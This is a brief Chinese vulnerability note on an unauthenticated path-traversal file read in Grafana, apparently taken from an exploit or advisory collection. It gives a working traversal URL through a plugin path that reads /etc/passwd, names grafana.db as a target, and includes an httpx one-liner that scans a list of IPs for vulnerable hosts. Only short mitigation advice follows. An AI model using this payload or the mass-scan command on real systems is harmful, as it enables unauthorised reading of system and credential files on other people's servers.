Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。
Example: /var/lib/grafana/grafana.db


https://xx.xx.xx.xx/public/plugins/grafana-clock-panel/../../../../../../etc/passwd

其他插件

批量
cat ip1.txt | xargs -I {} echo {} | httpx -status-code -path "/public/plugins/logs/../../../../../../../../etc/passwd" -mc 200 -ms 'root:x:0:0'
目前没有详细的解决方案提供,请关注厂商主页更新:https://grafana.com/
临时修复建议:
1、通过防火墙等安全设备设置访问策略,设置白名单访问。
2、如非必要,禁止公网访问该系统。
参考链接